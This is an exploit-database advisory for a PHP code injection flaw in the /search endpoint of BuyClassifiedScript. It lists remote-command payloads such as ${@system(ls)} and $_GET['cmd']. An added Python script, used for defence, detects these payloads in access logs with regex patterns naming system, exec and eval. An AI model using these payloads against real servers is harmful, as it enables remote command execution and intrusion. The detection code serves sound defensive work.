BuyClassifiedScript - PHP Code Injection

Author: d3b4g
type: webapps
platform: php
port: 
date_added: 2012-11-26
date_updated: 2012-11-26
verified: 1
codes: OSVDB-87875
tags:
aliases:
screenshot_url:
application_url:

raw file: 22929.txt  
# Exploit Title: buyclassifiedscript PHP code injection vulnerability
# Date: 25.11.201
# Exploit Author: d3b4g
# Vendor Homepage: http://buyclassifiedscript.com/
# Tested on: Windows 7
# Blog: d3b4g.me




----------------------------------------------------------------------------------

     This vulnerability allows an attacker to inject custom code
     into the server-side scripting engine. It's possible to obtain remote command
     execution by taking advantage of this vulnerability.


     Vulnerable function:

     /search/


     () PHP code execution:


     http://localhost/path/search {Inject malicious code}


     () examples of code that can be injected:


     //
        ${@system(ls)}

        ${@print(hello)}

        $_GET['cmd']
     //
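     For defenders, the payloads above are easy to spot in web server access logs
     once the request URI is percent-decoded. The following script is an added
     example written for this page; it is not code from the advisory, its author,
     or the vendor. It assumes a combined-style access log format, uses a
     constructed sample log with documentation-range IP addresses, and the
     indicator patterns are this example's own choices, not a vendor signature set.
     It decodes URIs repeatedly so that double-encoded payloads are not missed.

```python
import re
from urllib.parse import unquote_plus

# Indicators of the PHP code-injection payloads the advisory lists, as seen in
# a request URI. These patterns are this example's own choice of what to flag,
# not a vendor- or advisory-supplied signature set.
INDICATORS = {
    # "${...(" : PHP complex-string syntax wrapping a function call, e.g. ${@system(ls)}
    "interpolated_call": re.compile(r"\$\{\s*@?\s*[a-z_][a-z0-9_]*\s*\(", re.I),
    # direct reference to a request superglobal, e.g. $_GET['cmd']
    "superglobal": re.compile(r"\$_(GET|POST|REQUEST|COOKIE|SERVER)\b"),
    # command-execution / eval functions regardless of how they are wrapped
    "exec_function": re.compile(
        r"\b(system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(", re.I
    ),
}

# Apache/nginx "combined"-style access line (assumed format for the sample below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3})'
)

VULNERABLE_PREFIX = "/search"  # endpoint named in the advisory


def decode_uri(uri, max_rounds=3):
    """Percent-decode repeatedly so that double-encoded payloads are exposed.
    Stops early once a round changes nothing."""
    for _ in range(max_rounds):
        decoded = unquote_plus(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def classify_request(uri):
    """Return the sorted list of indicator names that match the decoded URI."""
    decoded = decode_uri(uri)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))


def scan_log(lines):
    """Return one finding per request line that carries an injection indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than crash on them
        hits = classify_request(m.group("uri"))
        if not hits:
            continue
        findings.append({
            "ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "status": int(m.group("status")),
            "decoded_uri": decode_uri(m.group("uri")),
            "on_vulnerable_endpoint": m.group("uri").startswith(VULNERABLE_PREFIX),
            "indicators": hits,
        })
    return findings


# Constructed sample log: one benign search, three requests carrying the
# advisory's payloads (one of them double-encoded), and an unrelated POST.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Nov/2012:10:01:02 +0000] "GET /search/?q=used+bicycle HTTP/1.1" 200 5123
203.0.113.9 - - [26/Nov/2012:10:01:05 +0000] "GET /search/?q=%24%7B%40system%28ls%29%7D HTTP/1.1" 200 4099
203.0.113.9 - - [26/Nov/2012:10:01:09 +0000] "GET /search/?q=%2524%257B%2540print%2528hello%2529%257D HTTP/1.1" 200 4001
203.0.113.9 - - [26/Nov/2012:10:01:12 +0000] "GET /search/?q=%24_GET%5B%27cmd%27%5D&cmd=id HTTP/1.1" 200 4012
198.51.100.4 - - [26/Nov/2012:10:02:00 +0000] "POST /login HTTP/1.1" 302 0
""".splitlines()


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "VULN-PATH" if f["on_vulnerable_endpoint"] else "other"
        print(f'{f["timestamp"]} {f["ip"]} [{flag}] '
              f'{",".join(f["indicators"])} {f["decoded_uri"]}')
```

     Run against the constructed sample, three of the five lines are flagged, all on
     the /search path; the double-encoded print payload is only caught because
     decode_uri keeps decoding until the URI stops changing. The indicator names in
     each finding tell a responder which payload family was attempted, and the
     on_vulnerable_endpoint flag separates hits on the advisory's endpoint from
     probing elsewhere on the site.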



-end-